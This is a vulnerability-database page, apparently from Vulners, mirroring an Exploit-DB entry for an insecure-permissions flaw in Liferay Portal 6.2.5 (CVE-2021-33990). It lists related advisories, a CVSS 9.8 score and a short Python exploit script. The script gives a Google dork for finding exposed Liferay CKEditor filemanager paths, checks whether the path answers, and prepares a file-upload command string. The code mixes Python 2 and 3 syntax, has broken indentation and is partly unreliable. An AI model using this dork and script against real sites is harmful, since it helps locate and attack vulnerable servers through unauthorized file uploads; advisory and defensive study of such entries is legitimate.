Lucene search
K

Liferay Portal 6.2.5 - Insecure Permissions

🗓️ 05 Apr 2023 00:00:00Reported by Fu2x2000Type 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 207 Views

Liferay Portal 6.2.5 - Insecure Permissions, CVE-2021-3399

Related
Code
ReporterTitlePublishedViews
Family
0day.today
Liferay Portal 6.2.5 - Insecure Permissions Exploit
5 Apr 202300:00
zdt
Circl
CVE-2021-33990
16 Apr 202307:27
circl
CNNVD
Liferay Portal 安全漏洞
5 Apr 202300:00
cnnvd
CVE
CVE-2021-33990
16 Apr 202300:00
cve
Cvelist
CVE-2021-33990
16 Apr 202300:00
cvelist
NVD
CVE-2021-33990
16 Apr 202304:15
nvd
Packet Storm
Liferay Portal 6.2.5 Insecure Permissions
5 Apr 202300:00
packetstorm
Prion
Design/Logic Flaw
16 Apr 202304:15
prion
Positive Technologies
PT-2023-12239 · Liferay · Liferay Portal
16 Apr 202300:00
ptsecurity
RedhatCVE
CVE-2021-33990
9 Jan 202611:28
redhatcve
Rows per page
# Exploit Title: Liferay Portal 6.2.5 - Insecure Permissions
# Google Dork: -inurl:/html/js/editor/ckeditor/editor/filemanager/browser/
# Date: 2021/05
# Exploit Author: fu2x2000
# Version: Liferay Portal 6.2.5 or later
# CVE : CVE-2021-33990

 import requests
import json

print (" Search this on Google #Dork for liferay
-inurl:/html/js/editor/ckeditor/editor/filemanager/browser/")

url ="URL Goes Here
/html/js/editor/ckeditor/editor/filemanager/browser/liferay/frmfolders.html"
req = requests.get(url)
print req
sta = req.status_code
if sta == 200:
print ('Life Vulnerability exists')
cook = url
print cook
inject = "Command=FileUpload&Type=File&CurrentFolder=/"
#cook_inject = cook+inject
#print cook_inject
else:
print ('not found try a another method')


print ("solution restrict access and user groups")

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

05 Apr 2023 00:00Current
9.8High risk
Vulners AI Score9.8
CVSS 3.19.8
EPSS0.61124
SSVC
207